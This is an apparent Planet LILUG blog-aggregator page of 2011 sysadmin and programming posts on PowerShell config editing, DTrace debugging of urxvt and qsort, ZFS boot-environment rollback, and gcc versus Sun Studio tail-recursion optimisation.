Planet LILUG

November 07, 2011

Justin Dearing

Editing elements with periods in the name in PowerShell

Recently, a coworker asked me about a problem he was having with a PowerShell script that edited an app.config file. It was a simple enough fix for an experienced PowerShell programmer, but worth sharing the solution for those not as experienced.

For this article, I’ll use a very small example web.config that demonstrates the problem.

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="verbose" value="true"/>
  </appSettings>
  <system.web>
    <compilation debug="true" />
  </system.web>
</configuration>

The script my coworker was using worked something like this:

$scriptPath = $MyInvocation.MyCommand.Path
$dir = Split-Path $scriptPath

$configFile = 1(Get-Content "$($dir)\web.config")
'Before: ' + $configFile.configuration.appSettings.OuterXml
$configFile.configuration.appSettings.add.value = 'false'
'After:  ' + $configFile.configuration.appSettings.OuterXml

Which of course prints out the following output:

Before: <appSettings><add key="verbose" value="true" /></appSettings>
After:  <appSettings><add key="verbose" value="false" /></appSettings>

The actual script saved the configuration file and didn’t print anything to the screen, but that’s irrelevant to the problem. The problem was he needed to edit the <compilation/> element inside the <system.web> element. He tried this first:

$configFile = 1(Get-Content "$($dir)\web.config")
'Before: ' + $configFile.configuration.system.web.OuterXml
$configFile.configuration.system.web.compilation.debug = 'false'
'After:  ' + $configFile.configuration.system.web.OuterXml

Which got him the following:

Before:
Property 'debug' cannot be found on this object; make sure it exists and is settable.
At C:\Users\zippy\Documents\deleteme\posh.config\editConfig.ps1:3 char:50
+ $configFile.configuration.system.web.compilation. <<<< debug = 'false'
    + CategoryInfo          : InvalidOperation: (debug:String) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

After:

The problem was the dot in system.web. PowerShell uses a period to separate an object from its members. However, all is not lost, because there is an alternate notation.

[/powershell]'Before: ' + $configFile.configuration['system.web'].OuterXml
$configFile.configuration['system.web'].compilation.debug = 'false'
'After:  ' + $configFile.configuration['system.web'].OuterXml1

As you can see, we can reach into an xml element with indexer notation. Please note that you will get an error if you put a period before the opening square bracket, but a period is required after the closing square bracket. If you would like some more in depth knowledge of how indexers work, see this MSDN page. While that article is written from a C# perspective, the concepts can be applies to PowerShell as well.

by Justin at November 07, 2011 01:59 AM

November 05, 2011

Josef "Jeff" Sipek

DTrace: The utmp_update Debugger

For the past 2 years, I am a happy user of rxvt-unicode, aka urxvt. Recently, I noticed that my logs contained rather mysterious error messages:

Nov  3 22:46:03 meili utmp_update[1613]: [ID 845426 user.error] Wrong number of
	arguments or invalid user 

Sometimes, there were a dozen of these. Of course I filed a bug with the Illumos folks. Rich Lowe suggested using DTrace to figure out what is actually going on. It was time to look at the exit codes for utmp_update.

syscall::rexit:entry
/execname=="utmp_update"/
{
	printf("utmp_update exited with code %d", arg0);
	@[arg0] = count();
}

tick-60sec
{
	printa(@);
}

Since utmp is involved, it had something to do with terminals, so I tried to open some terminals and close them. That did it!

# dtrace -s catch-errors.d 
dtrace: script 'catch-errors.d' matched 2 probes
CPU     ID                    FUNCTION:NAME
  0     49                      rexit:entry utmp_update exited with code 0
  1     49                      rexit:entry utmp_update exited with code 0
  0     49                      rexit:entry utmp_update exited with code 7
  0     49                      rexit:entry utmp_update exited with code 7
  1     49                      rexit:entry utmp_update exited with code 0
  5     49                      rexit:entry utmp_update exited with code 0
  1     49                      rexit:entry utmp_update exited with code 0
  2     49                      rexit:entry utmp_update exited with code 0
  3     49                      rexit:entry utmp_update exited with code 7
  1  67549                      :tick-60sec 
                7                3
                0                6

It turns out that every time I closed a terminal, utmp_update exited with error 7. A quick glance at usr/src/cmd/utmp_update/utmp_update.c reveals:

/*
 * Return codes
 */
#define	NORMAL_EXIT		0
#define	BAD_ARGS		1
#define	PUTUTXLINE_FAILURE	2
#define	FORK_FAILURE		3
#define	SETSID_FAILURE		4
#define	ALREADY_DEAD		5
#define	ENTRY_NOTFOUND		6
#define	ILLEGAL_ARGUMENT	7
#define	DEVICE_ERROR		8

Aha! It really is an invalid argument. At this point, Rich pointed me to setutxline in libc.so. Sadly, for whatever reason, the probe pid*:libc.so.1:pututxline:entry didn’t work (it didn’t match anything). Rich suggested the following DTrace script:

proc:::exec
/strstr(args[0], "utmp") != NULL/
{
	trace(execname);
}

Pretty straightforward — the output told me that it was urxvt causing all this trouble.

Now, I knew to watch out for pututxline in urxvt. I tried to set a probe pid$target::pututxline:entry and use the new print function in DTrace, but due to a user error (read: sometimes I write stupid code) it didn’t work. Rich helped me navigate through mdb to get a print-out of the utx structure. At this point, it was a bit too late in the night and so I went to bed.

The next morning, I tried the print function again and this time I used it right and it printed out the structure:

struct utmpx {
    char [32] ut_user = [ "" ]
    char [4] ut_id = [ 'v', 't', '0', '2' ]
    char [32] ut_line = [ "pts/2" ]
    pid_t ut_pid = 0x193ec
    short ut_type = 0x8
    struct exit_status ut_exit = {
        short e_termination = 0
        short e_exit = 0
    }
    struct timeval ut_tv = {
        time_t tv_sec = 0x4eb55d2a
        suseconds_t tv_usec = 0x18adc
    }
    int ut_session = 0
    int [5] pad = [ 0, 0, 0, 0, 0 ]
    short ut_syslen = 0
    char [257] ut_host = [ "" ]
}

Everything looks right, except that the ut_user field is blank. I wonder if this could be the cause of it. Time to look at the urxvt code! (The ustack() action in a DTrace probe for pututxline:entry will tell you where to look.) Here’s a snippet from rxvt-unicode-9.12/libptytty/src/logging.C:

/*
 * remove utmp and wtmp entries
 */
void
ptytty_unix::logout ()
{
  ...
#ifdef HAVE_STRUCT_UTMPX
  setutxent ();
  tmputx = getutxid (utx);
  if (tmputx && tmputx->ut_pid == cmd_pid)
    pututxline (utx);
  endutxent ();
#endif
  ...
}

Ok, so it gets a utx struct and then it puts a different one. Let’s see how different those two are:

# cat getutxid.d
#include <utmpx.h>

pid$target::getutxid:return
{
	ustack();
	print(*(struct utmpx*)copyin(arg1, sizeof(struct utmpx)));
}
# dtrace -Cs getutxid.d -p 103403
dtrace: script 'getutxid.d' matched 1 probes
dtrace: pid 103403 has exited
CPU     ID                    FUNCTION:NAME
  4  67555                  getutxid:return 
              libc.so.1`getutxid+0xf1
              urxvt`_ZN11ptytty_unixD0Ev+0x16
              urxvt`_ZN9rxvt_termD1Ev+0x59b
              urxvt`_ZN9rxvt_term10destroy_cbERN2ev4idleEi+0x70
              urxvt`_ZN2ev4baseI7ev_idleNS_4idleEE12method_thunkI9rxvt_termXadL_ZNS5_10destroy_cbERS2_iEEEEvPS1_i+0x27
              urxvt`ev_invoke_pending+0x35
              urxvt`ev_run+0x520
              urxvt`main+0x29b
              urxvt`_start+0x83
struct utmpx {
    char [32] ut_user = [ "jeffpc" ]
    char [4] ut_id = [ 'v', 't', '0', '2' ]
    char [32] ut_line = [ "pts/2" ]
    pid_t ut_pid = 0x193ec
    short ut_type = 0x7
    struct exit_status ut_exit = {
        short e_termination = 0
        short e_exit = 0x2
    }
    struct timeval ut_tv = {
        time_t tv_sec = 0x4eb55d1f
        suseconds_t tv_usec = 0x18adc
    }
    int ut_session = 0
    int [5] pad = [ 0, 0, 0, 0x303a0005, 0x302e ]
    short ut_syslen = 0
    char [257] ut_host = [ "" ]
}

Ok, it’s more or less the same. It does, however, have a username filled in. I wonder what would happen if I filled in the username. (The urxvt code seems to fill it in only on login updates and it leaves the field empty on logout updates.) Now, I had 3 choices…

  1. Change the urxvt code to fill in the username on logout updates.
  2. Set a breakpoint in gdb or mdb and then tweak the structure before it is passed to utmp_update.
  3. Use DTraces “destructive” option to allow me to modify the process’s memory.

I chose #3.

Here’s the script in all its glory:

#pragma D option destructive

#include <utmpx.h>

pid$target::getutxid:return
{
	ustack();
	print(*(struct utmpx*)copyin(arg1, sizeof(struct utmpx)));
}

pid$target::pututxline:entry
{
	ustack();
	print(*(struct utmpx*)copyin(arg0, sizeof(struct utmpx)));
	printf("\nFIXING...\n");
	copyout("jeffpc\0", (uintptr_t)&((struct utmpx*)arg0)->ut_user[0], 7);
	print(*(struct utmpx*)copyin(arg0, sizeof(struct utmpx)));
}

pid$target::pututxline:return
{
	printf("pututxline returned %p", arg1);
}

And here’s the output:

# dtrace -Cs foo.d -p 103403
dtrace: script 'foo.d' matched 3 probes
dtrace: allowing destructive actions
dtrace: pid 103403 has exited
CPU     ID                    FUNCTION:NAME
  4  67555                  getutxid:return 
              libc.so.1`getutxid+0xf1
              urxvt`_ZN11ptytty_unixD0Ev+0x16
              urxvt`_ZN9rxvt_termD1Ev+0x59b
              urxvt`_ZN9rxvt_term10destroy_cbERN2ev4idleEi+0x70
              urxvt`_ZN2ev4baseI7ev_idleNS_4idleEE12method_thunkI9rxvt_termXadL_ZNS5_10destroy_cbERS2_iEEEEvPS1_i+0x27
              urxvt`ev_invoke_pending+0x35
              urxvt`ev_run+0x520
              urxvt`main+0x29b
              urxvt`_start+0x83
struct utmpx {
    char [32] ut_user = [ "jeffpc" ]
    char [4] ut_id = [ 'v', 't', '0', '2' ]
    char [32] ut_line = [ "pts/2" ]
    pid_t ut_pid = 0x193ec
    short ut_type = 0x7
    struct exit_status ut_exit = {
        short e_termination = 0
        short e_exit = 0x2
    }
    struct timeval ut_tv = {
        time_t tv_sec = 0x4eb55d1f
        suseconds_t tv_usec = 0x18adc
    }
    int ut_session = 0
    int [5] pad = [ 0, 0, 0, 0x303a0005, 0x302e ]
    short ut_syslen = 0
    char [257] ut_host = [ "" ]
}
  4  67556                 pututxline:entry 
              libc.so.1`pututxline
              urxvt`_ZN11ptytty_unix6logoutEv+0x15c
              urxvt`_ZN11ptytty_unixD0Ev+0x16
              urxvt`_ZN9rxvt_termD1Ev+0x59b
              urxvt`_ZN9rxvt_term10destroy_cbERN2ev4idleEi+0x70
              urxvt`_ZN2ev4baseI7ev_idleNS_4idleEE12method_thunkI9rxvt_termXadL_ZNS5_10destroy_cbERS2_iEEEEvPS1_i+0x27
              urxvt`ev_invoke_pending+0x35
              urxvt`ev_run+0x520
              urxvt`main+0x29b
              urxvt`_start+0x83
struct utmpx {
    char [32] ut_user = [ "" ]
    char [4] ut_id = [ 'v', 't', '0', '2' ]
    char [32] ut_line = [ "pts/2" ]
    pid_t ut_pid = 0x193ec
    short ut_type = 0x8
    struct exit_status ut_exit = {
        short e_termination = 0
        short e_exit = 0
    }
    struct timeval ut_tv = {
        time_t tv_sec = 0x4eb55d2a
        suseconds_t tv_usec = 0x18adc
    }
    int ut_session = 0
    int [5] pad = [ 0, 0, 0, 0, 0 ]
    short ut_syslen = 0
    char [257] ut_host = [ "" ]
}
FIXING...
struct utmpx {
    char [32] ut_user = [ "jeffpc" ]
    char [4] ut_id = [ 'v', 't', '0', '2' ]
    char [32] ut_line = [ "pts/2" ]
    pid_t ut_pid = 0x193ec
    short ut_type = 0x8
    struct exit_status ut_exit = {
        short e_termination = 0
        short e_exit = 0
    }
    struct timeval ut_tv = {
        time_t tv_sec = 0x4eb55d2a
        suseconds_t tv_usec = 0x18adc
    }
    int ut_session = 0
    int [5] pad = [ 0, 0, 0, 0, 0 ]
    short ut_syslen = 0
    char [257] ut_host = [ "" ]
}
  4  67557                pututxline:return pututxline returned fef6ecf0

We can see the getutxid return a reasonable utmpx. Then we see pututxline get a utmpx without a username set. Then there is the fixed up tmpx. Finally, we see that the pututxline returned a non-NULL pointer. (It returns NULL on error — which does indeed happen without the fix-up.)

There you have it, folks. DTrace let me debug an issue without annoying change-compile-install cycles. Now, all I have to do is fix up urxvt in OpenIndiana and possibly, if it applies to other systems, push the fix upstream.

by JeffPC at November 05, 2011 09:54 PM

October 28, 2011

Josef "Jeff" Sipek

Timesavers: ZFS & BE

I’ve mentioned Boot Environments before. Well, earlier this week BEs and ZFS snapshots saved me a bunch of time. Here’s what happened.

I was in the middle of installing some package (pkg install foo) when my laptop locked up. I had to power cycle it the hard way. When it booted back up, I retried the install, but pkg complained that some state file was corrupted and it didn’t want to do anything. Uh oh. I’ve had similar issue happen to me on Debian with aptitude, so I knew that the hard way of fixing this issue was going to take more time than I’d like to dedicate to it (read: none). Thankfully, I use OpenIndiana which has ZFS and BEs.

  1. Reboot into a BE from a while ago (openindiana-3). The latest BE (openindiana-4) was created by pkg about a month ago as a clone of openindiana-3 during a major upgrade.
  2. Figure out which automatic ZFS snapshot I want to revert to. A matter of running zfs list -t all rpool/ROOT/openindiana-4 | tail -5 and picking the latest snapshot which I believe is from before pkg messed it all up. I ended up going an hour back just to make sure.
  3. Revert the BE. beadm rollback openindiana-4@zfs-auto-snap_hourly-2011-10-25-19h11
  4. Reboot back into openindiana-4.

After the final reboot, everything worked just fine. (Since the home directories are on a different dataset, they were left untouched.)

Total downtime: 5 minutes
Ease of repair: trivial

Your Turn

Do you have a corrupt package manager war story? Did you just restore from backup? Let me know in a comment.

by JeffPC at October 28, 2011 04:12 PM

October 26, 2011

Nate Berry

My EliteBook FAILs, back to the Mac (long)


In the first week of July I received in a bunch of machines off my company’s UPS technology subsidy. The story of the subsidy is probably worth a post all its own, but suffice to say, UPS basically gives the company a bunch of PCs every so often based on how much we ship with [...]

by Nate at October 26, 2011 01:34 AM

October 24, 2011

Josef "Jeff" Sipek

Jasmine Strikes Back

Everyone can appreciate a cute photo of a cat. Here’s Jasmine again:

Jasmine

by JeffPC at October 24, 2011 12:44 AM

October 13, 2011

Josef "Jeff" Sipek

Recursion with Sun Studio

I mentioned my post about recursion & DTrace in the #dtrace, and one of the folks there asked about Sun’s/Oracle’s compiler — Studio. I happen to have version 12u1, so why not have some more fun? :)

First things first, the results. With -O1, both variants recurse — 6 calls followed by 6 returns. With -O2, the naive code still recurses, while the explicitly-coded-as-tail-recursive code tail-recurses.

Here are the disassemblies (for -O2). Naive-recursive:

08050aa0 <fac>:
 8050aa0:	55                   	push   %ebp
 8050aa1:	8b ec                	mov    %esp,%ebp
 8050aa3:	53                   	push   %ebx
 8050aa4:	83 ec 04             	sub    $0x4,%esp
 8050aa7:	83 e4 f0             	and    $0xfffffff0,%esp
 8050aaa:	8b 5d 08             	mov    0x8(%ebp),%ebx
 8050aad:	83 fb 01             	cmp    $0x1,%ebx
 8050ab0:	7f 07                	jg     8050ab9 <fac+0x19>
 8050ab2:	b8 01 00 00 00       	mov    $0x1,%eax
 8050ab7:	eb 12                	jmp    8050acb <fac+0x2b>
 8050ab9:	83 ec 0c             	sub    $0xc,%esp
 8050abc:	8d 43 ff             	lea    -0x1(%ebx),%eax
 8050abf:	50                   	push   %eax
 8050ac0:	e8 db ff ff ff       	call   8050aa0 <fac>
 8050ac5:	83 c4 10             	add    $0x10,%esp
 8050ac8:	0f af c3             	imul   %ebx,%eax
 8050acb:	8d 65 fc             	lea    -0x4(%ebp),%esp
 8050ace:	5b                   	pop    %ebx
 8050acf:	c9                   	leave  
 8050ad0:	c3                   	ret    

and tail-recursive:

08050aa0 <fac>:
 8050aa0:	55                   	push   %ebp
 8050aa1:	8b ec                	mov    %esp,%ebp
 8050aa3:	8b 55 08             	mov    0x8(%ebp),%edx
 8050aa6:	8b 45 0c             	mov    0xc(%ebp),%eax
 8050aa9:	83 fa 01             	cmp    $0x1,%edx
 8050aac:	7e 0d                	jle    8050abb <fac+0x1b>
 8050aae:	8d 4a ff             	lea    -0x1(%edx),%ecx
 8050ab1:	0f af c2             	imul   %edx,%eax
 8050ab4:	8b d1                	mov    %ecx,%edx
 8050ab6:	83 f9 01             	cmp    $0x1,%ecx
 8050ab9:	7f f3                	jg     8050aae <fac+0xe>
 8050abb:	89 45 0c             	mov    %eax,0xc(%ebp)
 8050abe:	89 55 08             	mov    %edx,0x8(%ebp)
 8050ac1:	c9                   	leave  
 8050ac2:	c3                   	ret 

I find it fascinating that Studio produced nearly identical code to gcc. The big differences that you can see are: (1) Studio defaults to saving the frame pointer while gcc omitted it, (2) gcc inserted a no-op to 16-byte align the loop, and (3) Studio uses an extra register to perform the subtraction (the n-1).

The subtraction surprised me, and so I examined the code more closely. My guess is that Studio attempts to move the subtraction as far up as possible to start it early. This way, by the time we actually need the subtracted value (the cmp instruction) it’s already available. Compare that to gcc’s sub followed immediately by cmp. Some processors are designed in such a way that the result of sub will be available by the time cmp wants to execute. Others are not.

Your Turn

Have you noticed any interesting compiler optimizations? Share them in a comment!

by JeffPC at October 13, 2011 11:30 PM

October 12, 2011

Josef "Jeff" Sipek

Recursion

Last night while reading about DTrace, I came across an example that involved tracing a simple recursive factorial program. I pointed it out to my girlfriend, Holly, since I thought that she’d find it interesting — the class she teaches has a section about recursion.

Here’s the original code:

extern int fac (int n);

int main(int argc, char **argv)
{
	int f;
	f = fac(6);
	return 0;
}

int fac (int n)
{
	if (n <= 1)
		return 1;
	else
		return n * fac (n - 1);
}

Pretty simple. I compiled it, and ran it with DTrace:

$ gcc -o fac orig.c 
$ cat fac.d 
pid$target::fac:entry
{
        trace (arg0);
}
pid$target::fac:return
{
        trace (arg1);
}
$ sudo dtrace -Fs fac.d -c ./fac
dtrace: script 'fac.d' matched 2 probes
dtrace: pid 1146 has exited
CPU FUNCTION                                 
  0  -> fac                                                   6
  0    -> fac                                                 5
  0      -> fac                                               4
  0        -> fac                                             3
  0          -> fac                                           2
  0            -> fac                                         1
  0            <- fac                                         1
  0          <- fac                                           2
  0        <- fac                                             6
  0      <- fac                                              24
  0    <- fac                                               120
  0  <- fac                                                 720

Cool! I thought I was done. Holly asked whether it would work with tail-recursion. Interesting, I thought…it might - depending on how gcc handles the function prologue and epilogue. The D script is a little different to dump both of the arguments. Here’s the result:

$ gcc -o fact tail.c
$ cat fact.d 
pid$target::fac:entry
{
        trace (arg0); trace(arg1);
}
pid$target::fac:return
{
        trace (arg1);
}
$ sudo dtrace -Fs fact.d -c ./fact
dtrace: script 'fact.d' matched 2 probes
dtrace: pid 1233 has exited
CPU FUNCTION                                 
  2  -> fac                                                   6                1
  2    -> fac                                                 5                6
  2      -> fac                                               4               30
  2        -> fac                                             3              120
  2          -> fac                                           2              360
  2            -> fac                                         1              720
  2            <- fac                                       720
  2          <- fac                                         720
  2        <- fac                                           720
  2      <- fac                                             720
  2    <- fac                                               720
  2  <- fac                                                 720

You can see the values getting calculated and passed down versus them getting calculated on during the return. That was fun to see. But wait! If this function is tail recursive, why are we seeing all these returns? It should be just one return! Doh! I didn’t compile with optimizations so gcc emitted the stupidest possible code. Easy enough to fix:

$ gcc -o fact -O2 tail.c 
$ sudo dtrace -Fs fact.d -c ./fact
dtrace: script 'fact.d' matched 2 probes
dtrace: pid 1304 has exited

$

Huh… nothing happened! fac was never called. Let’s see what gcc emitted:

$ objdump -S fact
...
Disassembly of section .text.startup:

08050d10 <main>:
 8050d10:       31 c0                   xor    %eax,%eax
 8050d12:       c3                      ret  

Great, the main function turned into a return 0 because the value returned by fac() was never used. Easy enough, let’s just return the value from main.

$ cat tail.c 
extern int fac (int n);

int main(int argc, char **argv)
{
        return fac(6);
}

int fac (int n)
{
        if (n <= 1)
                return 1;
        else
                return n * fac (n - 1);
}
$ gcc -o fact -O2 tail.c 
$ objdump -S fact
...
Disassembly of section .text.startup:

08050d10 <main>:
 8050d10:       b8 d0 02 00 00          mov    $0x2d0,%eax
 8050d15:       c3                      ret    

Argh! Thanks gcc, you replaced my fib(6) function call with the value 720 — that is the factorial of 6. Fine, let’s do this the hard way: get an int from the first argument and print it out. Also, to prevent inlining, let’s put it in a separate file. So, now we have:

$ cat fac.c
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

extern int fac (int n);

int main(int argc, char **argv)
{
        printf("%d\n", fac(atoi(argv[1])));
        return 0;
}
$ cat fac_2.c
int fac (int n)
{
        if (n <= 1)
                return 1;
        else
                return n * fac (n - 1);
}
$ cat fact.c
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

extern int fac (int n, int v);

int main(int argc, char **argv)
{
        printf("%d\n", fac(atoi(argv[1]), 1));
        return 0;
}
$ cat fact_2.c
int fac (int n, int v)
{
        if (n <= 1)
                return v;
        else
                return fac(n-1, n*v);
}

Now, if we run the two variants compiled with -O2, we get:

$ sudo dtrace -Fs fac.d -c "./fac 6"
dtrace: script 'fac.d' matched 2 probes
720
dtrace: pid 1397 has exited
CPU FUNCTION                                 
  2  -> fac                                                   6
  2  <- fac                                                 720

$ sudo dtrace -Fs fact.d -c "./fact 6"
dtrace: script 'fact.d' matched 2 probes
720
dtrace: pid 1399 has exited
CPU FUNCTION                                 
  5  -> fac                                                   6                1
  5  <- fac                                                 720

Weird, for both we can see only one function entry and return. Let’s try with -O1:

$ sudo dtrace -Fs fac.d -c "./fac 6"
dtrace: script 'fac.d' matched 2 probes
720
dtrace: pid 1393 has exited
CPU FUNCTION                                 
  6  -> fac                                                   6
  6    -> fac                                                 5
  6      -> fac                                               4
  6        -> fac                                             3
  6          -> fac                                           2
  6            -> fac                                         1
  6            <- fac                                         1
  6          <- fac                                           2
  6        <- fac                                             6
  6      <- fac                                              24
  6    <- fac                                               120
  6  <- fac                                                 720

$ sudo dtrace -Fs fact.d -c "./fact 6"
dtrace: script 'fact.d' matched 2 probes
720
dtrace: pid 1395 has exited
CPU FUNCTION                                 
  2  -> fac                                                   6                1
  2    -> fac                                                 5                6
  2      -> fac                                               4               30
  2        -> fac                                             3              120
  2          -> fac                                           2              360
  2            -> fac                                         1              720
  2            <- fac                                       720
  2          <- fac                                         720
  2        <- fac                                           720
  2      <- fac                                             720
  2    <- fac                                               720
  2  <- fac                                                 720

Ok, now were back to having call and return instructions for both cases — the tail recursive function is not actually tail recursing when it should. So, first moral of the story is: -O1 is not enough to make tail recursive functions tail recurse. The odd behavior of the non-tail recursive code with -O2 is still weird. Let’s disassemble it; first the simple recursive code:

08050d00 <fac>:
 8050d00:       8b 54 24 04             mov    0x4(%esp),%edx
 8050d04:       b8 01 00 00 00          mov    $0x1,%eax
 8050d09:       83 fa 01                cmp    $0x1,%edx
 8050d0c:       7e 0d                   jle    8050d1b <fac+0x1b>
 8050d0e:       66 90                   xchg   %ax,%ax
 8050d10:       0f af c2                imul   %edx,%eax
 8050d13:       83 ea 01                sub    $0x1,%edx
 8050d16:       83 fa 01                cmp    $0x1,%edx
 8050d19:       75 f5                   jne    8050d10 <fac+0x10>
 8050d1b:       f3 c3                   repz ret 
 8050d1d:       90                      nop    
 8050d1e:       90                      nop    
 8050d1f:       90                      nop    

Whoa! gcc turned the plain recursive code into a tail-recursive one. For comparison, here’s the disassembly of the explicitly-coded-as-tail-recursive function:

08050d00 <fac>:
 8050d00:       8b 54 24 04             mov    0x4(%esp),%edx
 8050d04:       8b 44 24 08             mov    0x8(%esp),%eax
 8050d08:       83 fa 01                cmp    $0x1,%edx
 8050d0b:       7e 0e                   jle    8050d1b <fac+0x1b>
 8050d0d:       8d 76 00                lea    0x0(%esi),%esi
 8050d10:       0f af c2                imul   %edx,%eax
 8050d13:       83 ea 01                sub    $0x1,%edx
 8050d16:       83 fa 01                cmp    $0x1,%edx
 8050d19:       75 f5                   jne    8050d10 <fac+0x10>
 8050d1b:       f3 c3                   repz ret 
 8050d1d:       90                      nop    
 8050d1e:       90                      nop    
 8050d1f:       90                      nop

Do you see it? It’s virtually identical to what gcc emitted for the naive code.

So there you have it folks. The compiler is smarter than you, more consistent than you, and less likely to screw up compared to you when converting a recursive function into a tail-recursive one. In general, you should not prematurely optimize.

In case you care, I’ve used gcc 4.6.1 for these experiments on OpenIndiana.

Your Turn

Do you have an interesting compiler optimization story? Share it in a comment!

by JeffPC at October 12, 2011 05:47 PM

Justin Lintz

NRPE returning no output?

command[check_recent_core]=PLUGINPATH/check_recent_core.sh --file="$ARG1" --freshness=$ARG2$

Spot the error? I only wasted an hour of my life and another 30 minutes of co-workers trying to figure out why I kept getting a "NRPE: No output returned from plugin" error in Nagios. The issue? $ARG1 is missing a closing “$”. *slams head on desk*

by justin at October 12, 2011 01:37 AM

October 09, 2011

Justin Dearing

HashTables and New-Object -Property in Powershell

There are many uses for the New-Object cmdlet. One of the more obvious uses is to transform a HashTable to a PSObject, perhaps to be pipelined into Format-Table.

New-Object PSObject -Property @{
    Name = "Justin Dearing";
    Occupation = ".NET Developer"
}

That is a convenient output formatting trick because you can then pass it to an Out-* or Format-* cmdlet. However, this trick has uses beyond formatting. For example, lets say you encapsulated web service calls into a PowerShell module via the New-WebServiceProxy cmdlet. If the parameters of the service methods of the object in question aren’t .NET primitives like strings and ints, you will need to figure out how your wrapper functions will take those parameters. Once again New-Object -Property and a HashTable. Consider this contrived example:

$service = New-WebServiceProxy http://somedomain/webservices/something.svc?wsdl  -Namespace SomeService

function Get-Something ([HashTable]$SomethingRequest) {
    $request = New-Object SomeService.GetSomethingRequest -Property $SomethingRequest;
    return $service.GetSomethingRequest($SomethingRequest);
}

Note that you might want to use Parameter Sets to allow the user of your module to pass either a HashTable or the native request object in production.

One final note, you need to be aware that New-Object’s -Property parameter doesn’t handle nested HashTable’s. To Illustrate, consider the following PowerShell snippet:

Add-Type -TypeDefinition @"

public class Child {
	string name;
	public string Name {
		get { return name; }
		set { name = value; }
	}

	string email;
	public string Email {
		get { return email; }
		set { email = value; }
	}
}

public class Container {
	string name;
	public string Name {
		get { return name; }
		set { name = value; }
	}

	private Child myChild;
	public Child MyChild {
	 	get { return myChild; }
		set { myChild = value; }
	}
}
"@

$container = New-Object Container -Property @{
	Name = 'My Container'
	MyChild = @{
		Name = 'Justin Dearing'
		Email = 'justin@dearing.com'
	}
}

This will return the following error:

New-Object : The value supplied is not valid, or the property is read-only. Change the value, and then try again.
At C:\Users\jdearing\AppData\Local\Temp\e072a665-0543-4b85-9489-e843b9b932e5.ps1:32 char:24
+ $container = New-Object <<<< Container -Property @{
 + CategoryInfo : InvalidData: (:) [New-Object], Exception
 + FullyQualifiedErrorId : InvalidValue,Microsoft.PowerShell.Commands.NewObjectCommand

The workaround for this is you have to call New-Object on $container.MyChild first as follows:

Add-Type -TypeDefinition @"

public class Child {
	string name;
	public string Name {
		get { return name; }
		set { name = value; }
	}

	string email;
	public string Email {
		get { return email; }
		set { email = value; }
	}
}

public class Container {
	string name;
	public string Name {
		get { return name; }
		set { name = value; }
	}

	private Child myChild;
	public Child MyChild {
	 	get { return myChild; }
		set { myChild = value; }
	}
}
"@

$container = @{
	Name = 'My Container'
	MyChild = @{
		Name = 'Justin Dearing'
		Email = 'justin@dearing.com'
	}
}

$container.MyChild = New-Object Child -Property $container.MyChild;
$container = New-Object Container -Property $container;

Naturally, your code can get very verbose if your class is very complicated. You could probably write a script that reflects on the object type and handles nested HashTables. I’ll leave that as an exercise to the reader.

These three examples should help you gain a better understanding of the New-Object cmdlet and HashTable’s in PowerShell.

by Justin at October 09, 2011 08:42 PM

October 03, 2011

Josef "Jeff" Sipek

update_drv: adding a driver alias

Over the weekend, I got fed up with my laptop (Thinkpad T520) using the VESA driver even though I have an NVidia card. After some searching online, I came to the conclusion that the nvidia driver I had installed (280.13) should work with my card but there was an alias missing. So, I ran the following to add an alias for the PCI ID:

# update_drv -a -i '"pciex10de,1057"' nvidia

A reboot (really, X restart would have done, but it is nice to know that things come up as expected during a reboot) later, I was greeted by accelerated graphics. Yay!

Of course I created a bug for OpenIndiana to have the missing alias added. This post is supposed to serve as a reminder for myself about how to use update_drv.

by JeffPC at October 03, 2011 03:32 PM

October 02, 2011

Josef "Jeff" Sipek

DTrace: qsort use in Firefox, part 2

Earlier, I wrote about some silly qsort behavior in Firefox. I couldn’t help but dig a bit deeper.

Before, we concluded that there were a lot of 8-element, 4-byte element sorts. What are these used for? What part of Firefox is causing these? DTrace to the rescue.

First, let’s change the last DTrace command from last time a bit. First of all, let’s look at 4-byte element invocations only (arg2 equals 4) and let’s aggregate on the caller function name:

# dtrace -n 'pid1120:libc:qsort:entry/arg2==4/{@[ufunc(ucaller)]=llquantize(arg1, 10,0,6,20)} tick-60sec{printa(@)}'

...
  1  75455                      :tick-60sec 
  libnss3.so`DPCache_GetUpToDate                    
           value  ------------- Distribution ------------- count    
             < 1 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 14       
               1 |                                         0        

  libglib-2.0.so.0.2501.0`g_array_sort              
           value  ------------- Distribution ------------- count    
             700 |                                         0        
             750 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1        
             800 |                                         0        

  libfontconfig.so.1`FcFontSetSort                  
           value  ------------- Distribution ------------- count    
              55 |                                         0        
              60 |@                                        4        
              65 |                                         2        
              70 |                                         0        
              75 |@@@@                                     20       
              80 |@@@@@                                    24       
              85 |@@@@@@@                                  36       
              90 |@@@@@                                    26       
              95 |                                         0        
             100 |@@@@@@@@@@@@@@                           76       
             150 |@@@@                                     22       
             200 |                                         0        

  libcairo.so.2.10800.10`_cairo_bentley_ottmann_tessellate_bo_edges
           value  ------------- Distribution ------------- count    
               3 |                                         0        
               4 |@                                        59       
               5 |                                         0        
               6 |                                         32       
               7 |                                         0        
               8 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@            2357     
               9 |                                         0        
              10 |@@                                       137      
              15 |@@@                                      215      
              20 |@                                        52       
              25 |                                         12       
              30 |@                                        58       
              35 |@@                                       200      
              40 |@                                        67       
              45 |                                         3        
              50 |                                         2        
              55 |                                         2        
              60 |                                         7        
              65 |                                         0        
              70 |@                                        67       
              75 |                                         0        
              80 |                                         0        
              85 |                                         0        
              90 |                                         0        
              95 |                                         16       
             100 |                                         0   

We see four unique functions that call qsort. It doesn’t take long to spot the one we were looking for: _cairo_bentley_ottmann_tessellate_bo_edges in libcairo.so. Interesting, so it turns out that it wasn’t Firefox itself doing all these sorts (8-element, 4-byte element) but rather the Cairo graphics library. It would also seem that it is the only place that does these sorts. Let’s see how Firefox is involved in this.

# dtrace -n 'pid1120:libc:qsort:entry/arg2==4 && arg1==8/{@[ustack()]=count()} tick-60sec{printa(@)}'

...
  0  75455                      :tick-60sec 

              libc.so.1`qsort
              libcairo.so.2.10800.10`_cairo_bentley_ottmann_tessellate_bo_edges+0x172
